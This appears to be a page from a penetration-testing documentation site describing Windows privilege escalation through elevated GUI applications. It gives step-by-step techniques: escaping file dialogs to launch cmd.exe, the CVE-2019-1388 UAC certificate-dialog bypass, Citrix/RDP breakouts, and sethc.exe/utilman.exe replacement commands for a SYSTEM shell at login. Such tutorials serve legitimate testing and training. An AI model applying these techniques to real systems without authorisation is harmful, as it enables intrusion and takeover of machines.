> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Insecure GUI Applications

> Privilege escalation via GUI applications running as admin: file dialog escape and browser-based command execution.

## Overview

If an application runs with elevated privileges and provides a GUI (file browser, help menu, print dialog), you can abuse it to spawn a command prompt as that user.

***

## Identify GUI Apps Running as Admin

```cmd theme={"dark"}
tasklist /v | findstr /i "admin"
```

```powershell theme={"dark"}
Get-Process | Where-Object { $_.MainWindowTitle -ne "" } | Select ProcessName, Id, MainWindowTitle
```

Check with Process Explorer or Task Manager → look for processes running as SYSTEM or Administrator with a visible window.

***

## File Dialog Escape

Many applications have File → Open or File → Save As dialogs.

### Steps

1. Open the elevated application
2. Navigate to File → Open (or Save As, Print, Help)
3. In the file dialog address bar, type:

```
C:\Windows\System32\cmd.exe
```

4. Press Enter → cmd.exe opens with the application's privileges

### Alternative Paths

```
\\127.0.0.1\c$\Windows\System32\cmd.exe
file:///C:/Windows/System32/cmd.exe
```

### Right-click in File Dialog

1. In file dialog, navigate to `C:\Windows\System32`
2. Right-click → Open → select `cmd.exe`

***

## Help Menu Escape

1. Open Help → About or press F1
2. If browser opens → navigate to:

```
file:///C:/Windows/System32/cmd.exe
```

3. Or use address bar to navigate to local files

***

## Paint / Notepad / WordPad

If running elevated:

### Notepad

```
File → Open → type C:\Windows\System32\cmd.exe → Enter
```

Or open any file, then in the path bar navigate to System32.

### Paint

```
File → Open → navigate to C:\Windows\System32 → change file type to "All Files" → right-click cmd.exe → Open
```

***

## Internet Explorer / Edge (Legacy)

If browser runs elevated:

Address bar:

```
file:///C:/Windows/System32/cmd.exe
```

Or:

```
C:\Windows\System32\cmd.exe
```

***

## CVE-2019-1388 — Certificate Dialog

UAC prompt → "Show more details" → certificate issuer link → opens browser as SYSTEM.

### Requirements

* Windows 7/8/10 (pre-patch)
* Need a signed executable with a certificate that has a URL in the issuer field

### Steps

1. Run a signed binary (e.g., `hhupd.exe`)
2. UAC prompt appears → click "Show more details"
3. Click "Show information about the publisher's certificate"
4. Click the issuer URL link → browser opens as SYSTEM
5. Save As → navigate to `C:\Windows\System32\cmd.exe`

### Find Suitable Binary

```bash theme={"dark"}
https://github.com/jas502n/CVE-2019-1388
```

***

## Citrix / RDP Breakout

In restricted Citrix/RDP environments:

### Task Manager

```
Ctrl+Shift+Esc → File → New Task → cmd.exe
```

### Sticky Keys Replacement (Physical/RDP)

If you can replace `sethc.exe`:

```cmd theme={"dark"}
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```

At login screen → press Shift 5 times → SYSTEM shell.

### Utilman Replacement

```cmd theme={"dark"}
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
```

At login screen → click Ease of Access → SYSTEM shell.

***

## Quick Reference

| Scenario                      | Technique                             |
| ----------------------------- | ------------------------------------- |
| Elevated app with File dialog | Navigate to cmd.exe                   |
| Elevated browser              | `file:///C:/Windows/System32/cmd.exe` |
| UAC prompt (CVE-2019-1388)    | Certificate issuer link               |
| RDP/Citrix breakout           | Task Manager → New Task               |
| Login screen access           | sethc.exe / utilman.exe replacement   |
